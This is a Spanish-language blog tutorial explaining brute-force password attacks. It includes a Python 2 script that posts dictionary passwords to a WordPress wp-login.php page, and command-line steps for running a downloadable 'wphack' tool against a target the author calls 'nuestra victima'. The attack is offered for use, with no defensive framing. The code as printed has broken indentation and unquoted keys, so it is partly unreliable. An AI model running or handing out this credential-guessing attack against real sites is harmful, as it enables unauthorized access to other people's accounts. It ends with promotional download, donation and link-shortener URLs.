¿Qué es un ataque de fuerza bruta?
Un ataque de fuerza bruta, en criptografía, es la forma de recuperar una clave probando con todas las combinaciones posibles hasta encontrar la correcta.
Para realizar un ataque por fuerza bruta, se deben de tener en cuenta varios aspectos
La longitud de la palabra que deseamos obtener (en este caso usuario y contraseña)
El alfabeto utilizado para obtener todas las combinaciones posibles.
Por ejemplo, una contraseña consta de varios caracteres que pueden ser letras, números, caracteres especiales, etc. Para realizar este tipo de ataques se debe utilizar un diccionario de contraseñas.
El tamaño del diccionario dependerá de la posibilidad de encontrar la contraseña correcta pero también, el tiempo que tarde el ataque estará condicionado por el tamaño de dicho diccionario.
En el caso de hoy lo haremos mediante la realización de nuestro propio script en python pero, en otras ocasiones explicaremos como hacerlo con herramientas muy sencillas como WPScan o CMSmap.
Modulos utilizados para el script
Como ya sabemos, python trabaja mediante el uso de módulos con los cuales obtener las funcionalidades que necesitemos en cada momento. En el caso de hoy, los módulos que vamos a utilizar son los siguientes:
Módulo Requests, Urllib, Urllib2: Permiten interactuar con aplicaciones web. Trabajar con Métodos GET, POST, etc.
Módulo BeautifulSoup: Permite leer estructuras HTML / XML para extraer datos.
Módulo Re: Permite realizar búsquedas sobre expresiones regulares.
Módulo Socks: Permite realizar conexiones entre Cliente/Servidor.
Módulo Mechanize: Permite emular un navegador.
Módulo Cookielib: Permite manejar cookies de sesión y de esta manera poder trabajar directamente con la sesión del usuario.
Módulo Selenium: Interactúa con el Navegador (Chrome, Firefox, etc.) para ejecutar tareas designadas.
Scrapy: Framework escrito en Python, orientado al proceso de descubrimiento de directorios, archivos. (Crawling).
Comunidad Cyber Hacking
Requisitos
Sistema operativo Windows,lunux.
Instalar python2.7
Editor de texto (notepad+)
Descargar el proyecto completo wp
Script
#!/usr/bin/python
# Importamos los modulos necesarios.
import requests
# Abrimos el diccionario.
dictionary = open("password.txt","r")
# Leemos cada palabra del diccionario una a una.
for word in dictionary.readlines():
#creamos una variable con los datos del POST
data = {
log:wordpress,
pwd:word.strip("\n")
}
# Realizamos una peticion POST con los datos de wordpress.
r = requests.post("http://wordpress.local/wp-login.php", data=data, allow_redirects=False)
# Comprobamos si el resultado de la conexion nos devuelve un codigo 301 o 302.
# Si el resultado es uno de estos dos codigos, la pass sera la correcta.
if r.status_code in [301,302]:
print "Las credenciales: wordpress : %s son validas" %(word.strip("\n"))
break
else:
print "Las credenciales: wordpress : %s son invalidas" %(word.strip("\n"))
#Lo primero será importar el módulo request, que como ya hemos #mencionado antes, nos permite interactuar con aplicaciones web.
# Importamos los modulos necesarios.
Pasos
Ingresamos la pagina de wordpress de nuestra victima , yo usare una pagina local de prueba que podido configurar.
Una vez descargado el proyecto ,ingresar al cmd= windows + r
Nos dirigimos a la ruta donde se encuentra el proyecto ejecutamos Wp.py o como también WP.exe
Luego ingresamos los comandos y la url de la web de wordpress.Wp.py -t localhost/web/Prueba/wordpress/wp-login.php -u Admin -w password.txt
Podemos observar que esta haciendo verificación con la lista de fuerza bruta y el script ,mientras tenga mas palabras claves nuestro diccionario se demorara .
Listo eso seria todo , Te invito a ser parte de nuestra comunidad Cyber Hacking compartimos contenido como también colaboramos a cada usuario con sus dudas .
Descargar mega
Link wphack
Github
Donación paypal
https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&hosted_button_id=MJPRV838AYA2J&source=url
https://join-adf.ly/21179079
Mi nombre es Luishiño aquí es donde me gusta escribir sobre temas que en su momento me interesan. Aveces sobre mi vida personal y principalmente cosas de programación ,desarrollo web.Aplicaciones,Software, programas que yo mismo las desarrollo y cosas básicas de informática.
Fuente: este post proviene de The Seven Codes, donde puedes consultar el contenido original.
¿Vulnera este post tus derechos? Pincha aquí.
Creado:
